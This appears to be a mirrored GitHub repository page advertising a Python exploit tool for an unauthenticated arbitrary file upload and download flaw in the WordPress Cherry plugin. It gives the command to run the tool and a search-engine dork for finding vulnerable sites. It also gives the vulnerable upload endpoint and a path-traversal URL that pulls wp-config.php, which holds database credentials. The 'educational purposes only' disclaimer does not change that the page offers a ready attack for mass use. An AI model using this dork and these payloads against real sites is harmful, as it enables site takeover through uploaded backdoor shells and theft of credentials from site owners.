Giters

InMyMine7 / Cherry-Plugin

The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

worpress-pluginplugins-wordpresscherry-plugins

WordPress (CMS) Cherry-Plugin Arbitrary File Upload RCE

Requirement :

  • Python 2.7.18
  • pip 19.2.3

How To Usage :

python2 sxc.py

Example Dork

inurl:/wp-content/plugins/cherry-plugin/

Proof of Concept

Upload: The following file was affected: https://www.example.com/wp-content/plugins/cherry-plugin/admin/import-export/upload.php

Download: https://example.com/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php

Classification Type : UPLOAD CWE : CWE-434

DISCLAIMER : THIS TOOLS IS FOR EDUCATIONAL PURPOSES ONLY. AND WE DO NOT CONDONE ANY ILLEGAL ACTIVITIES

About

The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.

worpress-pluginplugins-wordpresscherry-plugins

Languages

Language:PHP 100.0%